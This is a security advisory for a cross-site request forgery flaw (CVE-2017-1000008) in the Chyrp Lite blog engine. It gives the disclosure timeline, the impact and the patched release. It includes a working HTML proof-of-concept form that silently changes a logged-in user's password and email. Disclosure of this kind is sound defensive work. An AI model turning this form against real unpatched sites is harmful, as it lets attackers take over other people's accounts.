Product: Chyrp Lite
Vendor: Open source community
Version: 2016.04 “Lago” and earlier
Category: Cross site request forgery (CSRF)
Vendor Notified: 2017-01-05
Patched: 2017-01-06
Disclosed: 2017-03-06
Researcher(s): Carl Pearson
CVE: CVE-2017-1000008
Summary
A cross-site request forgery (CSRF) vulnerability exists in the user properites function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking authenticated users into visiting a webpage under attacker control.
Proof of Concept
Example HTML attack form:
[code language=”html”]
<!– The form submits when this button is clicked. –>
<button onclick="document.csrf_form.submit()">Click to run</button>
<!– Edit the ‘action’ attribute to reflect the IP address or hostname of the victim’s Chyrp install. –>
<form name="csrf_form" id="csrf_form" method="POST" action="http://[host]/?action=controls">
<input class="text" type="text" name="login" value="user" id="login" disabled="disabled"/>
<input type="text" name="full_name" value="" id="full_name" tabindex="1"/>
<input type="text" name="email" value="user@example.com" id="email" tabindex="1"/>
<input type="text" name="website" value="http://yahoo.com" id="website" tabindex="1"/>
<input type="password" name="new_password1" value="apple" id="new_password1"/>
<input type="password" name="new_password2" value="apple" id="new_password2"/>
</form>
[/code]
Impact
If successful, an attacker can arbitrarily change the user’s password, email, and username to any desired values.
Solution
Chyrp Lite version 2017.01 “Swainson” patches this issue. Updating any existing Chyrp Lite installs is recommended.
Reference
Project home: https://github.com/xenocrat/chyrp-lite
v2017.01 release notes: https://github.com/xenocrat/chyrp-lite/releases/tag/v2017.01
Changelog: https://github.com/xenocrat/chyrp-lite/commit/79bb2de7f57d163d256b6bdb127dc09cfdb6235a
OWASP CSRF overview: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
Edit 7/13/17: CVE identifier added.